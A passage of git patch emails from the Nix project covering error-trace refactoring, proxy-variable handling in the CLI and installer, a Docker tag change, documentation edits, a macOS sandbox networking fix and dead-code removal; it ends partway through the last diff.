From 040874e4db904ecbca3964b6d22d35c423969729 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:14:33 -0800
Subject: [PATCH 501/654] Print all stack frames

---
 src/libutil/error.cc | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/src/libutil/error.cc b/src/libutil/error.cc
index 4a9efc0b5..d2a3d2114 100644
--- a/src/libutil/error.cc
+++ b/src/libutil/error.cc
@@ -373,7 +373,6 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s
     // prepended to each element of the trace
     auto ellipsisIndent = "  ";
 
-    bool frameOnly = false;
     if (!einfo.traces.empty()) {
         // Stack traces seen since we last printed a chunk of `duplicate frames
         // omitted`.
@@ -384,7 +383,6 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s
 
         for (const auto & trace : einfo.traces) {
             if (trace.hint.str().empty()) continue;
-            if (frameOnly && !trace.frame) continue;
 
             if (!showTrace && count > 3) {
                 oss << "\n" << ANSI_WARNING "(stack trace truncated; use '--show-trace' to show the full trace)" ANSI_NORMAL << "\n";
@@ -400,7 +398,6 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s
             printSkippedTracesMaybe(oss, ellipsisIndent, count, skippedTraces, tracesSeen);
 
             count++;
-            frameOnly = trace.frame;
 
             printTrace(oss, ellipsisIndent, count, trace);
         }

From f05c13ecc2345cb8c668289369b066b0520b919b Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:14:55 -0800
Subject: [PATCH 502/654] Remove the concept of "skipped frames"

---
 src/libexpr/eval-error.cc | 14 +++-----------
 src/libexpr/eval-error.hh |  2 +-
 src/libexpr/eval.cc       |  9 ++++-----
 src/libexpr/eval.hh       |  2 +-
 src/libexpr/primops.cc    |  7 +++----
 src/libutil/error.cc      |  7 +++----
 src/libutil/error.hh      |  3 +--
 7 files changed, 16 insertions(+), 28 deletions(-)

diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc
index f4cdeec5c..8db03610b 100644
--- a/src/libexpr/eval-error.cc
+++ b/src/libexpr/eval-error.cc
@@ -28,15 +28,7 @@ template
 EvalErrorBuilder & EvalErrorBuilder::withTrace(PosIdx pos, const std::string_view text)
 {
     error.err.traces.push_front(
-        Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = false});
-    return *this;
-}
-
-template
-EvalErrorBuilder & EvalErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text)
-{
-    error.err.traces.push_front(
-        Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = true});
+        Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text))});
     return *this;
 }
 
@@ -63,9 +55,9 @@ EvalErrorBuilder & EvalErrorBuilder::withFrame(const Env & env, const Expr
 }
 
 template
-EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, HintFmt hint, bool frame)
+EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, HintFmt hint)
 {
-    error.addTrace(error.state.positions[pos], hint, frame);
+    error.addTrace(error.state.positions[pos], hint);
     return *this;
 }
 
diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh
index 392902ad2..7e0cbe982 100644
--- a/src/libexpr/eval-error.hh
+++ b/src/libexpr/eval-error.hh
@@ -89,7 +89,7 @@ public:
 
     [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrame(const Env & e, const Expr & ex);
 
-    [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, HintFmt hint, bool frame = false);
+    [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, HintFmt hint);
 
     template
     [[nodiscard, gnu::noinline]] EvalErrorBuilder &
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 205d40b83..54b1125ce 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -811,9 +811,9 @@ void EvalState::addErrorTrace(Error & e, const char * s, const std::string & s2)
     e.addTrace(nullptr, s, s2);
 }
 
-void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2, bool frame) const
+void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const
 {
-    e.addTrace(positions[pos], HintFmt(s, s2), frame);
+    e.addTrace(positions[pos], HintFmt(s, s2));
 }
 
 template
@@ -1587,9 +1587,8 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value &
                         "while calling %s",
                         lambda.name
                         ? concatStrings("'", symbols[lambda.name], "'")
-                        : "anonymous lambda",
-                        true);
-                    if (pos) addErrorTrace(e, pos, "from call site%s", "", true);
+                        : "anonymous lambda");
+                    if (pos) addErrorTrace(e, pos, "from call site%s", "");
                 }
                 throw;
             }
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 42fe0d3e4..80b583eb1 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -435,7 +435,7 @@ public:
     [[gnu::noinline]]
     void addErrorTrace(Error & e, const char * s, const std::string & s2) const;
     [[gnu::noinline]]
-    void addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2, bool frame = false) const;
+    void addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const;
 
 public:
     /**
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 42cfa4917..835afba82 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -811,7 +811,7 @@ static void prim_addErrorContext(EvalState & state, const PosIdx pos, Value * *
         auto message = state.coerceToString(pos, *args[0], context,
                 "while evaluating the error message passed to builtins.addErrorContext",
                 false, false).toOwned();
-        e.addTrace(nullptr, HintFmt(message), true);
+        e.addTrace(nullptr, HintFmt(message));
         throw;
     }
 }
@@ -1075,7 +1075,7 @@ static void prim_derivationStrict(EvalState & state, const PosIdx pos, Value * *
         e.addTrace(nullptr, HintFmt(
                 "while evaluating derivation '%s'\n"
                 "  whose name attribute is located at %s",
-                drvName, pos), true);
+                drvName, pos));
         throw;
     }
 }
@@ -1233,8 +1233,7 @@ drvName, Bindings * attrs, Value & v)
 
         } catch (Error & e) {
             e.addTrace(state.positions[i->pos],
-                HintFmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName),
-                true);
+                HintFmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName));
             throw;
         }
     }
diff --git a/src/libutil/error.cc b/src/libutil/error.cc
index d2a3d2114..d1e864a1a 100644
--- a/src/libutil/error.cc
+++ b/src/libutil/error.cc
@@ -11,9 +11,9 @@
 
 namespace nix {
 
-void BaseError::addTrace(std::shared_ptr && e, HintFmt hint, bool frame)
+void BaseError::addTrace(std::shared_ptr && e, HintFmt hint)
 {
-    err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame });
+    err.traces.push_front(Trace { .pos = std::move(e), .hint = hint });
 }
 
 void throwExceptionSelfCheck(){
@@ -61,8 +61,7 @@ inline bool operator<(const Trace& lhs, const Trace& rhs)
     // This formats a freshly formatted hint string and then throws it away, which
     // shouldn't be much of a problem because it only runs when pos is equal, and this function is
     // used for trace printing, which is infrequent.
-    return std::forward_as_tuple(lhs.hint.str(), lhs.frame)
-        < std::forward_as_tuple(rhs.hint.str(), rhs.frame);
+    return lhs.hint.str() < rhs.hint.str();
 }
 inline bool operator> (const Trace& lhs, const Trace& rhs) { return rhs < lhs; }
 inline bool operator<=(const Trace& lhs, const Trace& rhs) { return !(lhs > rhs); }
diff --git a/src/libutil/error.hh b/src/libutil/error.hh
index 2e5de5d32..89f5ad021 100644
--- a/src/libutil/error.hh
+++ b/src/libutil/error.hh
@@ -64,7 +64,6 @@ void printCodeLines(std::ostream & out,
 struct Trace {
     std::shared_ptr pos;
     HintFmt hint;
-    bool frame;
 };
 
 inline bool operator<(const Trace& lhs, const Trace& rhs);
@@ -162,7 +161,7 @@ public:
         addTrace(std::move(e), HintFmt(std::string(fs), args...));
     }
 
-    void addTrace(std::shared_ptr && e, HintFmt hint, bool frame = false);
+    void addTrace(std::shared_ptr && e, HintFmt hint);
 
     bool hasTrace() const { return !err.traces.empty(); }
 

From 91e89628fdfe7b08e0f61b8531edd31833330e04 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:18:27 -0800
Subject: [PATCH 503/654] Make `addErrorTrace` variadic

---
 src/libexpr/eval.cc | 12 +++++++-----
 src/libexpr/eval.hh |  6 ++++--
 2 files changed, 11 insertions(+), 7 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 54b1125ce..c4e163b08 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -806,14 +806,16 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
     }
 }
 
-void EvalState::addErrorTrace(Error & e, const char * s, const std::string & s2) const
+template
+void EvalState::addErrorTrace(Error & e, const Args & ... formatArgs) const
 {
-    e.addTrace(nullptr, s, s2);
+    e.addTrace(nullptr, HintFmt(formatArgs...));
 }
 
-void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const
+template
+void EvalState::addErrorTrace(Error & e, const PosIdx pos, const Args & ... formatArgs) const
 {
-    e.addTrace(positions[pos], HintFmt(s, s2));
+    e.addTrace(positions[pos], HintFmt(formatArgs...));
 }
 
 template
@@ -1588,7 +1590,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value &
                         lambda.name
                         ? concatStrings("'", symbols[lambda.name], "'")
                         : "anonymous lambda");
-                    if (pos) addErrorTrace(e, pos, "from call site%s", "");
+                    if (pos) addErrorTrace(e, pos, "from call site");
                 }
                 throw;
             }
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 80b583eb1..01abd4eb1 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -432,10 +432,12 @@ public:
     std::string_view forceString(Value & v, NixStringContext & context, const PosIdx pos, std::string_view errorCtx);
     std::string_view forceStringNoCtx(Value & v, const PosIdx pos, std::string_view errorCtx);
 
+    template
     [[gnu::noinline]]
-    void addErrorTrace(Error & e, const char * s, const std::string & s2) const;
+    void addErrorTrace(Error & e, const Args & ... formatArgs) const;
+    template
     [[gnu::noinline]]
-    void addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2) const;
+    void addErrorTrace(Error & e, const PosIdx pos, const Args & ... formatArgs) const;
 
 public:
     /**

From fe6408b5df4a2a4c2342a02bc9f94abf4ca88a85 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 22 Feb 2024 17:58:37 -0800
Subject: [PATCH 504/654] Update snapshots

---
 tests/functional/lang/eval-fail-duplicate-traces.err.exp   | 7 +++++++
 .../eval-fail-foldlStrict-strict-op-application.err.exp    | 7 +++++++
 tests/functional/lang/eval-fail-mutual-recursion.err.exp   | 7 +++++++
 3 files changed, 21 insertions(+)

diff --git a/tests/functional/lang/eval-fail-duplicate-traces.err.exp b/tests/functional/lang/eval-fail-duplicate-traces.err.exp
index 32ad9b376..cedaebd3b 100644
--- a/tests/functional/lang/eval-fail-duplicate-traces.err.exp
+++ b/tests/functional/lang/eval-fail-duplicate-traces.err.exp
@@ -41,4 +41,11 @@ error:
              |                ^
             5|     if n > 0
 
+       … while calling the 'throw' builtin
+         at /pwd/lang/eval-fail-duplicate-traces.nix:7:10:
+            6|     then throwAfter (n - 1)
+            7|     else throw "Uh oh!";
+             |          ^
+            8| in
+
        error: Uh oh!
diff --git a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp
index 7cb08af8a..4903bc82d 100644
--- a/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp
+++ b/tests/functional/lang/eval-fail-foldlStrict-strict-op-application.err.exp
@@ -27,4 +27,11 @@ error:
              |      ^
             6|
 
+       … while calling the 'throw' builtin
+         at /pwd/lang/eval-fail-foldlStrict-strict-op-application.nix:5:9:
+            4|   null
+            5|   [ (_: throw "Not the final value, but is still forced!") (_: 23) ]
+             |         ^
+            6|
+
        error: Not the final value, but is still forced!
diff --git a/tests/functional/lang/eval-fail-mutual-recursion.err.exp b/tests/functional/lang/eval-fail-mutual-recursion.err.exp
index dc2e11766..c034afcd5 100644
--- a/tests/functional/lang/eval-fail-mutual-recursion.err.exp
+++ b/tests/functional/lang/eval-fail-mutual-recursion.err.exp
@@ -54,4 +54,11 @@ error:
 
        (21 duplicate frames omitted)
 
+       … while calling the 'throw' builtin
+         at /pwd/lang/eval-fail-mutual-recursion.nix:34:10:
+           33|     then throwAfterB true 10
+           34|     else throw "Uh oh!";
+             |          ^
+           35| in
+
        error: Uh oh!

From d3bff699aac0ff940e7e5551e39b53e62e780281 Mon Sep 17 00:00:00 2001
From: ramboman 
Date: Fri, 23 Feb 2024 01:05:25 -0500
Subject: [PATCH 505/654] `nix`: Fix `haveInternet` to check for proxy

---
 src/nix/main.cc | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/src/nix/main.cc b/src/nix/main.cc
index 39c04069b..687c072e0 100644
--- a/src/nix/main.cc
+++ b/src/nix/main.cc
@@ -23,6 +23,7 @@
 #include 
 #include 
 #include 
+#include 
 
 #include 
 
@@ -32,6 +33,24 @@ void chrootHelper(int argc, char * * argv);
 
 namespace nix {
 
+static bool haveProxyEnvironmentVariables()
+{
+    static const char * const proxyVariables[] = {
+        "http_proxy",
+        "https_proxy",
+        "ftp_proxy",
+        "HTTP_PROXY",
+        "HTTPS_PROXY",
+        "FTP_PROXY"
+    };
+    for (auto & proxyVariable: proxyVariables) {
+        if (std::getenv(proxyVariable)) {
+            return true;
+        }
+    }
+    return false;
+}
+
 /* Check if we have a non-loopback/link-local network interface. */
 static bool haveInternet()
 {
@@ -55,6 +74,8 @@ static bool haveInternet()
         }
     }
 
+    if (haveProxyEnvironmentVariables()) return true;
+
     return false;
 }
 

From bca737dcad2401b81d60f6ecf3f163b9346b5556 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Fri, 23 Feb 2024 10:28:37 +0100
Subject: [PATCH 506/654] c++-ize the proxy detection code

Just for consistency with the rest
---
 src/nix/main.cc | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/src/nix/main.cc b/src/nix/main.cc
index 687c072e0..5af5f2e41 100644
--- a/src/nix/main.cc
+++ b/src/nix/main.cc
@@ -23,7 +23,6 @@
 #include 
 #include 
 #include 
-#include 
 
 #include 
 
@@ -35,7 +34,7 @@ namespace nix {
 
 static bool haveProxyEnvironmentVariables()
 {
-    static const char * const proxyVariables[] = {
+    static const std::vector proxyVariables = {
         "http_proxy",
         "https_proxy",
         "ftp_proxy",
@@ -44,7 +43,7 @@ static bool haveProxyEnvironmentVariables()
         "FTP_PROXY"
     };
     for (auto & proxyVariable: proxyVariables) {
-        if (std::getenv(proxyVariable)) {
+        if (getEnv(proxyVariable).has_value()) {
             return true;
         }
     }

From 24fd7e2755bed3a854f8089c2db2fed89eb07f56 Mon Sep 17 00:00:00 2001
From: ramboman 
Date: Sat, 24 Feb 2024 01:00:13 +0000
Subject: [PATCH 507/654] `install-multi-user.sh`: `_sudo`: add proxy variables
 to sudo

---
 scripts/install-multi-user.sh | 27 ++++++++++++++++++++++++++-
 1 file changed, 26 insertions(+), 1 deletion(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index ad3ee8881..1dbb93bf9 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -58,6 +58,31 @@ readonly EXTRACTED_NIX_PATH="$(dirname "$0")"
 
 readonly ROOT_HOME=~root
 
+readonly PROXY_ENVIRONMENT_VARIABLES=(
+    http_proxy
+    https_proxy
+    ftp_proxy
+    no_proxy
+    HTTP_PROXY
+    HTTPS_PROXY
+    FTP_PROXY
+    NO_PROXY
+)
+
+SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
+
+setup_sudo_extra_environment_variables() {
+    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
+    for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
+        if [ "x${!variable:-}" != "x" ]; then
+            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
+            i=$((i + 1))
+        fi
+    done
+}
+
+setup_sudo_extra_environment_variables
+
 if [ -t 0 ] && [ -z "${NIX_INSTALLER_YES:-}" ]; then
     readonly IS_HEADLESS='no'
 else
@@ -361,7 +386,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo "$@"
+        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
     fi
 }
 

From 5598ce3e0f3a3cfce69d008c808920950e8c1139 Mon Sep 17 00:00:00 2001
From: zimbatm 
Date: Sat, 24 Feb 2024 11:15:58 +0100
Subject: [PATCH 508/654] ci: fix docker default tag

Docker uses "latest" as the default label instead of "master".

This change will allow `docker run ghcr.io/nixos/nix` to work without
having to specify the label.

It keeps the :master label on docker hub for back-compat.
---
 .github/workflows/ci.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index fdd2d67f6..38126dd68 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -153,6 +153,8 @@ jobs:
         IMAGE_ID=$(echo $IMAGE_ID | tr '[A-Z]' '[a-z]')
 
         docker tag nix:$NIX_VERSION $IMAGE_ID:$NIX_VERSION
-        docker tag nix:$NIX_VERSION $IMAGE_ID:master
+        docker tag nix:$NIX_VERSION $IMAGE_ID:latest
         docker push $IMAGE_ID:$NIX_VERSION
+        docker push $IMAGE_ID:latest
+        # deprecated 2024-02-24
         docker push $IMAGE_ID:master

From d83008c3a797c8e4ec1e1a97c5b1bc5e6b02c561 Mon Sep 17 00:00:00 2001
From: Johannes Kirschbauer 
Date: Sat, 24 Feb 2024 19:34:53 +0700
Subject: [PATCH 509/654] documentation: clarify genericClosure (#10003)

* doc: clarify genericClosure documentation

Co-authored-by: Valentin Gagarin 
---
 src/libexpr/primops.cc | 63 ++++++++++++++++++++++++++----------------
 1 file changed, 39 insertions(+), 24 deletions(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 835afba82..850cc7a45 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -705,38 +705,53 @@ static RegisterPrimOp primop_genericClosure(PrimOp {
     .args = {"attrset"},
     .arity = 1,
     .doc = R"(
-      Take an *attrset* with values named `startSet` and `operator` in order to
-      return a *list of attrsets* by starting with the `startSet` and recursively
-      applying the `operator` function to each `item`. The *attrsets* in the
-      `startSet` and the *attrsets* produced by `operator` must contain a value
-      named `key` which is comparable. The result is produced by calling `operator`
-      for each `item` with a value for `key` that has not been called yet including
-      newly produced `item`s. The function terminates when no new `item`s are
-      produced. The resulting *list of attrsets* contains only *attrsets* with a
-      unique key. For example,
+      `builtins.genericClosure` iteratively computes the transitive closure over an arbitrary relation defined by a function.
 
-      ```
-      builtins.genericClosure {
-        startSet = [ {key = 5;} ];
-        operator = item: [{
-          key = if (item.key / 2 ) * 2 == item.key
-               then item.key / 2
-               else 3 * item.key + 1;
-        }];
-      }
-      ```
-      evaluates to
-      ```
-      [ { key = 5; } { key = 16; } { key = 8; } { key = 4; } { key = 2; } { key = 1; } ]
-      ```
+      It takes an *attrset* with two attributes named `startSet` and `operator`, and returns a list of attribute sets:
+
+      - `startSet`:
+        The initial list of attribute sets.
+
+      - `operator`:
+        A function that takes an attribute set and returns a list of attribute sets.
+        It defines how each item in the current set is processed and expanded into more items.
+
+      Each attribute set in the list `startSet` and the list returned by `operator` must have an attribute `key`, which must support equality comparison.
+      The value of `key` can be one of the following types:
 
-      `key` can be one of the following types:
       - [Number](@docroot@/language/values.md#type-number)
       - [Boolean](@docroot@/language/values.md#type-boolean)
       - [String](@docroot@/language/values.md#type-string)
       - [Path](@docroot@/language/values.md#type-path)
       - [List](@docroot@/language/values.md#list)
 
+      The result is produced by calling `operator` on each `item` that has not been processed yet, including newly added items, until no new items are added.
+      Items are compared by their `key` attribute.
+
+      Common usages are:
+
+      - Generating unique collections of items, such as dependency graphs.
+      - Traversing through structures that may contain cycles or loops.
+      - Processing data structures with complex internal relationships.
+
+      > **Example**
+      >
+      > ```nix
+      > builtins.genericClosure {
+      >   startSet = [ {key = 5;} ];
+      >   operator = item: [{
+      >     key = if (item.key / 2 ) * 2 == item.key
+      >          then item.key / 2
+      >          else 3 * item.key + 1;
+      >   }];
+      > }
+      > ```
+      >
+      > evaluates to
+      >
+      > ```nix
+      > [ { key = 5; } { key = 16; } { key = 8; } { key = 4; } { key = 2; } { key = 1; } ]
+      > ```
       )",
     .fun = prim_genericClosure,
 });

From 9f11b1b0c4724ad81f91f14756b475e0de64379f Mon Sep 17 00:00:00 2001
From: Olmo Kramer 
Date: Sat, 24 Feb 2024 20:58:44 +0100
Subject: [PATCH 510/654] Accept multiple inputs in `nix flake update`

---
 src/nix/flake.cc | 22 ++++++++++++----------
 1 file changed, 12 insertions(+), 10 deletions(-)

diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 131589f35..de23a122d 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -88,17 +88,19 @@ public:
         expectArgs({
             .label="inputs",
             .optional=true,
-            .handler={[&](std::string inputToUpdate){
-                InputPath inputPath;
-                try {
-                    inputPath = flake::parseInputPath(inputToUpdate);
-                } catch (Error & e) {
-                    warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
-                    throw e;
+            .handler={[&](std::vector inputsToUpdate){
+                for (auto inputToUpdate : inputsToUpdate) {
+                    InputPath inputPath;
+                    try {
+                        inputPath = flake::parseInputPath(inputToUpdate);
+                    } catch (Error & e) {
+                        warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
+                        throw e;
+                    }
+                    if (lockFlags.inputUpdates.contains(inputPath))
+                        warn("Input '%s' was specified multiple times. You may have done this by accident.");
+                    lockFlags.inputUpdates.insert(inputPath);
                 }
-                if (lockFlags.inputUpdates.contains(inputPath))
-                    warn("Input '%s' was specified multiple times. You may have done this by accident.");
-                lockFlags.inputUpdates.insert(inputPath);
             }},
             .completer = {[&](AddCompletions & completions, size_t, std::string_view prefix) {
                 completeFlakeInputPath(completions, getEvalState(), getFlakeRefsForCompletion(), prefix);

From a82aeedb5b9e24c9788febab3dcf65169b79cece Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Sat, 24 Feb 2024 15:52:16 -0800
Subject: [PATCH 511/654] Warn on implicit switch case fallthrough

This seems to have found one actual bug in fs-sink.cc: the symlink case
was falling into the regular file case, which can't possibly be
intentional, right?
---
 Makefile               | 2 +-
 src/libexpr/lexer.l    | 3 +++
 src/libutil/fs-sink.cc | 2 ++
 3 files changed, 6 insertions(+), 1 deletion(-)

diff --git a/Makefile b/Makefile
index d3542c3e9..f8689c8cf 100644
--- a/Makefile
+++ b/Makefile
@@ -81,7 +81,7 @@ ifdef HOST_WINDOWS
   GLOBAL_LDFLAGS += -Wl,--export-all-symbols
 endif
 
-GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src
+GLOBAL_CXXFLAGS += -g -Wall -Wimplicit-fallthrough -include $(buildprefix)config.h -std=c++2a -I src
 
 # Include the main lib, causing rules to be defined
 
diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l
index 380048c77..5b26d6927 100644
--- a/src/libexpr/lexer.l
+++ b/src/libexpr/lexer.l
@@ -94,6 +94,9 @@ static StringToken unescapeStr(SymbolTable & symbols, char * s, size_t length)
 
 }
 
+// The lexer generated by flex uses unannotated fallthrough.
+#pragma GCC diagnostic ignored "-Wimplicit-fallthrough"
+
 #define YY_USER_INIT initLoc(yylloc)
 #define YY_USER_ACTION adjustLoc(yylloc, yytext, yyleng);
 
diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc
index 95b6088da..35ce0ac36 100644
--- a/src/libutil/fs-sink.cc
+++ b/src/libutil/fs-sink.cc
@@ -15,6 +15,7 @@ void copyRecursive(
     case SourceAccessor::tSymlink:
     {
         sink.createSymlink(to, accessor.readLink(from));
+        break;
     }
 
     case SourceAccessor::tRegular:
@@ -38,6 +39,7 @@ void copyRecursive(
                 sink, to + "/" + name);
             break;
         }
+        break;
     }
 
     case SourceAccessor::tMisc:

From d60c3f7f7c83134b5b4470ed84b6d5ed38e28753 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Simon=20=C5=BDlender?= 
Date: Sun, 25 Feb 2024 23:00:57 +0100
Subject: [PATCH 512/654] Fix __darwinAllowLocalNetworking sandbox

The sandbox rule `(allow network* (local ip))` doesn't do what it
implies. Adding this rule permits all network traffic. We should be
matching on (remote ip "localhost:*")` instead.
---
 src/libstore/build/sandbox-defaults.sb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/build/sandbox-defaults.sb b/src/libstore/build/sandbox-defaults.sb
index 25ec11285..2ad5fb616 100644
--- a/src/libstore/build/sandbox-defaults.sb
+++ b/src/libstore/build/sandbox-defaults.sb
@@ -45,7 +45,7 @@ R""(
 ; allow it if the package explicitly asks for it.
 (if (param "_ALLOW_LOCAL_NETWORKING")
     (begin
-      (allow network* (local ip) (local tcp) (local udp))
+      (allow network* (remote ip "localhost:*"))
 
       ; Allow access to /etc/resolv.conf (which is a symlink to
       ; /private/var/run/resolv.conf).

From 8ac4542593e583e86009d953d89f8683f7eef9fb Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Mon, 26 Feb 2024 17:59:07 +0800
Subject: [PATCH 513/654] .gitignore: ignore historical test binaries

After commit 91b6833686a6 (" Move tests to separate directories, and
document"), previously-built test executables are now tracked by Git,
which is annoying for developers.

This patch add .gitignore rules to ignore the obsolete test directories
to solve such problem and enhance developer experience.
---
 .gitignore | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/.gitignore b/.gitignore
index a0a0786ed..5c1136823 100644
--- a/.gitignore
+++ b/.gitignore
@@ -45,13 +45,16 @@ perl/Makefile.config
 /src/libexpr/parser-tab.hh
 /src/libexpr/parser-tab.output
 /src/libexpr/nix.tbl
+/src/libexpr/tests
 /tests/unit/libexpr/libnixexpr-tests
 
 # /src/libstore/
 *.gen.*
+/src/libstore/tests
 /tests/unit/libstore/libnixstore-tests
 
 # /src/libutil/
+/src/libutil/tests
 /tests/unit/libutil/libnixutil-tests
 
 /src/nix/nix

From 219705ff64cc3411bc92b88fe369cd2999604986 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Mon, 26 Feb 2024 11:04:19 +0100
Subject: [PATCH 514/654] Remove dead code

Most of the code in `git.{cc,hh}` is dead, so get rid of it.
---
 src/libutil/fs-sink.cc    |  46 ------
 src/libutil/fs-sink.hh    |   7 -
 src/libutil/git.cc        | 289 --------------------------------------
 src/libutil/git.hh        | 152 --------------------
 tests/unit/libutil/git.cc | 205 ---------------------------
 5 files changed, 699 deletions(-)

diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc
index 35ce0ac36..0ebd750f6 100644
--- a/src/libutil/fs-sink.cc
+++ b/src/libutil/fs-sink.cc
@@ -5,52 +5,6 @@
 
 namespace nix {
 
-void copyRecursive(
-    SourceAccessor & accessor, const CanonPath & from,
-    FileSystemObjectSink & sink, const Path & to)
-{
-    auto stat = accessor.lstat(from);
-
-    switch (stat.type) {
-    case SourceAccessor::tSymlink:
-    {
-        sink.createSymlink(to, accessor.readLink(from));
-        break;
-    }
-
-    case SourceAccessor::tRegular:
-    {
-        sink.createRegularFile(to, [&](CreateRegularFileSink & crf) {
-            if (stat.isExecutable)
-                crf.isExecutable();
-            accessor.readFile(from, crf, [&](uint64_t size) {
-                crf.preallocateContents(size);
-            });
-        });
-        break;
-    }
-
-    case SourceAccessor::tDirectory:
-    {
-        sink.createDirectory(to);
-        for (auto & [name, _] : accessor.readDirectory(from)) {
-            copyRecursive(
-                accessor, from / name,
-                sink, to + "/" + name);
-            break;
-        }
-        break;
-    }
-
-    case SourceAccessor::tMisc:
-        throw Error("file '%1%' has an unsupported type", from);
-
-    default:
-        abort();
-    }
-}
-
-
 struct RestoreSinkSettings : Config
 {
     Setting preallocateContents{this, false, "preallocate-contents",
diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh
index ae577819a..670b55c2b 100644
--- a/src/libutil/fs-sink.hh
+++ b/src/libutil/fs-sink.hh
@@ -41,13 +41,6 @@ struct FileSystemObjectSink
     virtual void createSymlink(const Path & path, const std::string & target) = 0;
 };
 
-/**
- * Recursively copy file system objects from the source into the sink.
- */
-void copyRecursive(
-    SourceAccessor & accessor, const CanonPath & sourcePath,
-    FileSystemObjectSink & sink, const Path & destPath);
-
 /**
  * Ignore everything and do nothing
  */
diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 5733531fa..029e1af44 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -5,302 +5,13 @@
 #include 
 #include  // for strcasecmp
 
-#include "signals.hh"
-#include "config.hh"
-#include "hash.hh"
-#include "posix-source-accessor.hh"
-
 #include "git.hh"
-#include "serialise.hh"
 
 namespace nix::git {
 
 using namespace nix;
